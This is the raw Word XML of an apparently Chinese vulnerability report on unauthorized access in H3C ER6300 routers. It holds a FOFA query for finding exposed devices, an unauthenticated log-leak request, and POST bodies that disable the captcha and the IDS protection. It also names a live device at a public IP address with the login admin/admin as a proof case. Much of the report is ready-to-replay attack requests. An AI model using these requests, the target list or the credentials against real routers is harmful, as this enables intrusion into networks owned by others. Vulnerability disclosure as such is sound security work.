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52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>H3C ER6300存在未授权访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>资产证明：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1248410"/>
            <wp:effectExtent l="0" t="0" r="1397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1248410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>涉及产品</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3C ER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>63</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>00n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>路由器管理登录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FOFA语法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"H3C" &amp;&amp; title=="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ER6300</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系统管理"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2618740"/>
            <wp:effectExtent l="0" t="0" r="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73040" cy="2618740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第一处漏洞:日志泄露</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请求数据包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请求头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ER6300</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_SYSLOG.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>POST请求体</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CMD=SYS_LOG&amp;GO=maintain_logs.asp&amp;param=&amp;search_item=1&amp;txtMaxRows=15&amp;txtCurPageIndex=1&amp;auto_refresh=0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="2545080"/>
            <wp:effectExtent l="0" t="0" r="698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266055" cy="2545080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞二：禁用验证码功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>POST请求头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/goform/aspForm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>POST请求体</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CMD=SetExpiretime&amp;GO=device_user_manage.asp&amp;set_expiretime=5&amp;lanctrl_startip_hidden=0.0.0.0&amp;lanctrl_endip_hidden=255.255.255.255&amp;lanctrl_startip=0.0.0.0&amp;lanctrl_endip=255.255.255.255&amp;set_expire_time=5&amp;set_vld_flag=1&amp;vld_disable_flag=1&amp;forcequituserid=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2551430"/>
            <wp:effectExtent l="0" t="0" r="635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266690" cy="2551430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开启验证码功能请求头不变请求体为</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CMD=SetExpiretime&amp;GO=device_user_manage.asp&amp;set_expiretime=6&amp;lanctrl_startip_hidden=0.0.0.0&amp;lanctrl_endip_hidden=255.255.255.255&amp;lanctrl_startip=0.0.0.0&amp;lanctrl_endip=255.255.255.255&amp;set_expire_time=6&amp;set_vld_flag=0&amp;vld_disable_flag=0&amp;forcequituserid=</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上述只是一些在前端可证明的漏洞，其实整个站点所有功能点都存在这种漏洞，我将挑出几个案例进行展示</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>证明案例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://125.68.138.105:12345/home.asp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>admin/admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2755900"/>
            <wp:effectExtent l="0" t="0" r="7620" b="254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5265420" cy="2755900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>当前启动了功能点</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请求头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/goform/aspForm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请求体</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CMD=IDS&amp;GO=protect_ids.asp&amp;SET0=671354880%3D0&amp;SET1=671158272%3D0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="2453005"/>
            <wp:effectExtent l="0" t="0" r="8255" b="63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5264785" cy="2453005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成功进行了取消，由于大多数操作都比较敏感所以只拿出一个功能进行证明，实际整个站点功能都存在此漏洞</w:t>
      </w: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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一切漏洞复现过程当中只需要在执行功能的时候进行抓包将请求体和请求头使用hackbar进行向别的站点发包即可进行未授权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>涉及资产已经全部打包到了附件当中</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OTM4ZWQyNGQ1OTA0Y2IwYTQ5OWNjZmE4NDNkNTUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="374361B9"/>
    <w:rsid w:val="40D67DD6"/>
    <w:rsid w:val="41530CE4"/>
    <w:rsid w:val="540B3287"/>
    <w:rsid w:val="61A45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270</Words>
  <Characters>1073</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1079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2022-11-16T06:45:00Z</dcterms:created>
  <dc:creator>27490</dc:creator>
  <cp:lastModifiedBy>Ambition</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-09T06:30:58Z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67C3C4ECDC7D474882E10767D6095C55</vt:lpwstr>
  </property>
</Properties>
</file>